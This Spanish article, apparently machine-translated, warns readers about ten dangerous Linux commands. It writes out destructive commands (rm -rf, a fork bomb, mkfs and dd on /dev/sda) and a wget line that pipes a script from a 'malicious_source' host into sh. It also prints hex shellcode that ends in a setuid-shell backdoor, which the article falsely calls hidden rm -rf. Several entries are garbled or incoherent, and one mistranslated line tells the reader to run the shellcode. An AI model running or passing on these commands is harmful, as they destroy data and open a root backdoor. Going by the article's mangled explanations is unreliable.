Los 10 comandos de Linux más peligrosos que nunca debes ejecutar

Bueno, si alguna vez has usado el sistema operativo Linux, probablemente sepas que la plataforma es más independiente que Windows. Linux es un sistema operativo de código abierto que brinda suficiente libertad a los usuarios para realizar diferentes operaciones. Sin embargo, operar Linux puede ser una tarea desafiante para los usuarios de Linux por primera vez.

Al igual que en Windows, Linux también tiene muchos comandos de terminal para realizar diferentes operaciones. Sin embargo, a diferencia de Windows, Linux no le pide confirmación si ejecuta algún comando que pueda dañar su sistema. Por lo tanto, le recomendamos que no use estos comandos bajo ninguna circunstancia.

Índice
  1. Los 10 comandos de Linux más peligrosos que nunca debes ejecutar
    1. 1. rm -rf
    2. 2. : () {: |: };:
    3. 3. command / dev / sda
    4. 4. mv directory / dev / null
    5. 5. wgethttp: // malicious_source -O | sh
    6. 6. Mkfs.ext3 / dev /sda
    7. 7. File
    8. 8. ^ foo ^ bar
    9. 9. dd if = / dev / random of = / dev /sda
    10. 10 invisible Command

Los 10 comandos de Linux más peligrosos que nunca debes ejecutar

Entonces, en este artículo, vamos a compartir algunos comandos peligrosos de Linux que nunca debes ejecutar en Linux. Entonces, echemos un vistazo a los comandos mortales que nunca debe ejecutar en su computadora Linux.

1. rm -rf

El comando rm -rf es una de las formas más rápidas de eliminar una carpeta y su contenido. Pero un pequeño error tipográfico o ignorancia puede causar un daño irreparable al sistema. Algunas opciones utilizadas con el comando rm, como el comando Rm -r, eliminan carpetas recursivamente, incluso carpetas vacías. El comando rm -f elimina los "archivos de solo lectura" sin preguntar. También tiene la capacidad de eliminar todos los archivos presentes en el directorio raíz.

2. : () {: |: };:

El comando anterior es la bomba de horquilla. Se ejecuta definiendo una función llamada "" que se llama dos veces, una en primer plano y otra en segundo plano. Se ejecuta continuamente hasta que el sistema muere.

3. command / dev / sda

El comando anterior escribe la salida del comando 'en el bloque /dev/sda. El comando anterior escribe los datos originales y todos los archivos del bloque se reemplazarán con los datos originales, lo que provocará la pérdida de todos los datos del bloque.

4. mv directory / dev / null

Este comando básicamente mueve todos los archivos a /dev/null, sí, eso significa que simplemente desaparece todos los archivos del sistema.

5. wgethttp: // malicious_source -O | sh

El comando anterior descargará un script de una fuente maliciosa y luego lo ejecutará en su sistema. El comando wget descargará el script y el comando sh ejecutará el script descargado en su sistema.

6. Mkfs.ext3 / dev /sda

El comando anterior simplemente formateará el bloque 'sda', ¡está seguro de que después de ejecutar el comando anterior, su bloque (disco duro) se restablecerá a nuevo!Sin datos, el sistema estará en una etapa irrecuperable.

7. File

El comando anterior se utiliza para liberar el contenido del archivo. Si el comando anterior se ejecuta con errores tipográficos o por ignorancia, se escribirá como "xt.conf" en el archivo de configuración o en cualquier otro sistema o archivo de configuración.

8. ^ foo ^ bar

Este comando se utiliza para editar un comando anterior sin tener que volver a escribir todo el comando. Sin embargo, si no se arriesga a verificar dos veces los cambios en el comando original con el comando ^ ^ foo bar, podría haber problemas.

9. dd if = / dev / random of = / dev /sda

El comando anterior terminará en /dev/sda y escribirá datos aleatorios para el bloque.¡seguramente!Su sistema estará en un estado inconsistente e irrecuperable.

10 invisible Command

El siguiente comando no es más que el primer comando de este artículo (rm-rf). El código aquí está oculto en hexadecimal, y los usuarios ignorantes podrían ser engañados. Ejecute el siguiente código en su terminal y borre su partición raíz.

Este comando aquí muestra que las amenazas pueden ocultarse y, a veces, pasar desapercibidas. Debes saber lo que estás haciendo y cuál será el resultado. No compile ni ejecute código de fuentes desconocidas.

char esp[] __attribute__ ((section(“.text”))) /* esp release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″ “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″ “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″ “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″ “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″ “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″ “x6ex2fx73x68x00x2dx63x00″ “cp -p /bin /sh /tmp/.más allá;chmod 4755 /tmp/.más allá;";

Entonces, estos son algunos comandos peligrosos de Linux que debes evitar. No debe ejecutar este comando a toda costa.¡Espero que este artículo te ayude!También comparte con tus amigos.

Entradas relacionadas

Subir

Este sitio web utiliza cookies